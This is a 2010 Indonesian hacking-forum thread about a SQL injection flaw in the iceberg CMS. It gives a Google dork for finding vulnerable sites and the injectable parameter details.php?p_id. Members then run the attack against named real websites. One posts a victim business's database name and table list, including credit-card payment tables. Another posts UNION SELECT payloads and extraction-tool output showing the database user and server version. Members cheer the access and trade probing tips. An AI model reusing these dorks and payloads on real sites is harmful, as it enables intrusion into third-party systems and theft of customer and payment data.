Cyber Security Forum (X-code) - PT. Teknologi Server Indonesia

The largest cyber security forum in Indonesia with more than 129000 members
http://xcode.or.id/forum/

[Bug]SQL injection pada iceberg 'Content Management System'

http://xcode.or.id/forum/viewtopic.php?f=99&t=39284

Page 1 of 2

[Bug]SQL injection pada iceberg 'Content Management System'

Posted: Thu May 27, 2010 8:09 pm
by poni
The iceberg 'Content Management System' SQL Injection Vulnerability
Remote Exploit : Yes
Local Exploit : No
Victim interaction required : No
Exploit Available : Yes
Credit : by cyberlog
Published : 27.05.2010
Affected Software : imagetraders:iceberg_cms

==========================================================
The iceberg 'Content Management System' SQL Injection Vulnerability
==========================================================

# The iceberg 'Content Management System' SQL Injection Vulnerability
# Homepage : http://www.imagetraders.com.au
# Discovered : by cyberlog
# Dork : details.php?p_id= 'Design & SEO by Image Traders Pty Ltd'
# Exploit : http://[target]/details.php?p_id=[SQL Injection]
# Thanks : r0073r,adhietslank, k1n9k0ng, cr4wl3r,cah_gemblunkz,

jayoes,thesims,setiawan,irvian,EA_Angel,BlueSpy,SoEy,A-technique,Jantap,KiL
L SarifJedul,wiro gendeng,Letjen,ridho_bugs,Ryan
Kabrutz,Mathewsa.k.a Nyubicrew
# My Site : http://sekuritionline.net
# Channel : #sekuritionline
#special to Mama Sri Rahayu, Member& Staff Sekuritonline, C0li a.k.a
antisecurity [ pinjem script perl-na ] :),
Inj3ct0r Now Brothers with Sekuritionline
==============================================
We never die !!!! indonesian Underground Community
KacrUt I L0v3 U :P
Give me NOCAN Brothers :P
am nt hacker just Lik3 Syst3m S3curity

References :
http://xforce.iss.net/xforce/xfdb/58617
http://www.vupen.com/english/advisories/2010/1161
http://www.osvdb.org/64694
http://www.exploit-db.com/exploits/12620
http://secunia.com/advisories/39833
http://packetstormsecurity.org/1005-exp ... rg-sql.txt

Re: [Bug]SQL injection pada iceberg 'Content Management Syst

Posted: Thu May 27, 2010 8:18 pm
by baidhowi
idih bang poni emg kga ada matinya daah :love:

thanks pak

Re: [Bug]SQL injection pada iceberg 'Content Management Syst

Posted: Thu May 27, 2010 8:21 pm
by poni
Diatas adalah salah satu bug sql injection yang ditemukan oleh cyberlog dari forum saudara kita sekuritionline, pada produk CMS imagetrader milik iceberg. sebagai POC, mari lihat web dibawah ini:

Image

Code: Select all

http://www.wielandhelicopters.com.au/details.php?p_id=62'
dan setelah dicek, ditemukan:

Code: Select all

database = wiehel1_wielandhelicopters0com0au

dan terdiri dari tabel
e_c 	
e_cc 	
e_answer 	
e_account_payment 	
db_backup 	
cover 	
cost_title 	
cost_sub_title 	
cost_detail 	
content_template 	
content_option 	
content_config 	
contact_thank 	
contact_show 	
contact_paragraph 	
contact_page 	
contact_location 	
contact_field 	
contact 	
colour_font_help 	
cms_user_type 	
cms_user_group 	
cms_plugin_option 	
cms_plugin 	
client_secondary 	
client_pdf_folder 	
client_pdf 	
client_note 	
client_image 	
client_file 	
client_enquiry 	
client_category_email 	
client_category 	
client 	
cli_enquiry_answer 	
cli_enquiry 	
cart_product 	
cart_payment_type 	
cart_payment_paypal 	
cart_payment_cc 	
cart_payment_bankdep 	
cart_payment 	
cart_option 	
cart_history 	
cart_config 	
cart 	
calendar_users 	
calendar_property 	
calendar_param 	
calendar_link 	
calendar_info_day 	
calendar_info 	
calendar_events 	
calendar_content 	
calendar_cat 	
business_location 	
booking_travellers 	
booking_package 	
booking_note 	
booking_meal 	
booking_item 	
booking_files 	
booking_fees 	
booking_email 	
booking 	
bo_paragraph 	
bo_help_plugin_paragraph 	
bo_help_option_paragraph 	
banner_image 	
banner 	
as_group 	
as_field 	
as_answer 	
agents
Selanjutnya silahkan anda pelajari sendiri.

Re: [Bug]SQL injection pada iceberg 'Content Management Syst

Posted: Thu May 27, 2010 10:39 pm
by shinichi81
Injin dipelajari Kk poni........

Re: [Bug]SQL injection pada iceberg 'Content Management Syst

Posted: Fri May 28, 2010 7:04 am
by 3xtr3m3b0y
poni wrote: dan setelah dicek, ditemukan:

Code: Select all

database = wiehel1_wielandhelicopters0com0au

dan terdiri dari tabel	
cart_product 	
cart_payment_type 	
cart_payment_paypal 	
cart_payment_cc 	
cart_payment_bankdep 	
cart_payment 	
cart_option 	
cart_history 	
cart_config
Oh tidaaakkk... :pusing:
Ya Tuhan kuatkanlah hatiku... :cry:
Nice share Master PONI... :love:

Re: [Bug]SQL injection pada iceberg 'Content Management Syst

Posted: Fri May 28, 2010 2:05 pm
by peniru
mantap kk, ijin eksplorasi :love: :love:

Re: [Bug]SQL injection pada iceberg 'Content Management Syst

Posted: Fri May 28, 2010 2:57 pm
by peniru
ane baru dapet kek bgini....
http://www.target.com.au/details.php?p_id=269 order by 1-- (no error)
tp kalo gini
http://www.target.com.au/details.php?p_id=269 order by 2-- (kok error yah)

mohon pencerahannya :mati: :mati:

Re: [Bug]SQL injection pada iceberg 'Content Management Syst

Posted: Fri May 28, 2010 3:00 pm
by iwan
santapan lezattttt.. :tapa: :tapa:

huwahahaha.. :ngakak: :ngakak:

Re: [Bug]SQL injection pada iceberg 'Content Management Syst

Posted: Fri May 28, 2010 3:37 pm
by peniru
hwa akhirna berhasil nemu satu.... hanya dengan memperhatikan jenis error saja jumlah colom bisa ketemu :devil :devil

Code: Select all

URL:http://www.imagetraders.com.au/details.php?p_id=-1+union+all+select+1,darkc0de,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
[+] Evasion Used: "+" "--"
[+] 15:32:20
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
	Database: imatra_imagetraders0com0au
	User: imatra_cms@localhost
	Version: 5.0.90-community
CMIIW :love: :love:

Re: [Bug]SQL injection pada iceberg 'Content Management Syst

Posted: Sat May 29, 2010 8:56 pm
by abit doang
nice,...
hajar pake fuzz aja ah,..
maklum nubi...
:tapa:
All times are UTC+07:00
Page 1 of 2
Powered by phpBB® Forum Software © phpBB Limited
https://www.phpbb.com/